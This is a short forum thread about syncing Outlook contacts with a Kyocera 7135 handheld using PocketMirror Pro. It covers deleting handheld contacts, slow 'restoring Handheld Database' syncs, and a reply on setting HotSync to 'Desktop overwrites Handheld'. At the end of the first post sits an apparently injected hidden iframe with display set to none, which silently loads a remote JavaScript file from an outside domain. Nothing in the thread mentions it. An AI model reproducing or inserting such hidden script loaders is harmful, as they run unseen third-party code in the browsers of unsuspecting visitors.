+ Reply to Thread

Synching with Outlook -Contact Question

Ok - I did a contact sync (using pocketmirror pro) and everything worked great -I got my contacts.

Then I deleted all the contacts in OUtlook and synched again -- thinking that it would delete all my contacts on the 7135 - but it did not.

Question - How can I delete all of the contacts on my 7135?

Also - I am now getting a "restoring Handheld Database" duing the sync process --- it seems to take VERY long for the sync - and also shows that I'm trying to sync items that I thought were already on the 7135. Is there a way to clear the "What's trying to sync" items?<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

It appears that your HotSync 'Custom' settings are set to 'Synchronize' your contacts, rather than to have your desktop overwrite your handheld. If you want your desktop to always overwrite what's on your handheld, click on the HotSync button in your system tray, and select 'Custom'. Then click on 'Outlook Contacts', and then click 'Change'. Then select 'Desktop overwrites Handheld', and check 'Set as Default'.
    Ahhhh, gadgets! :bigthumb: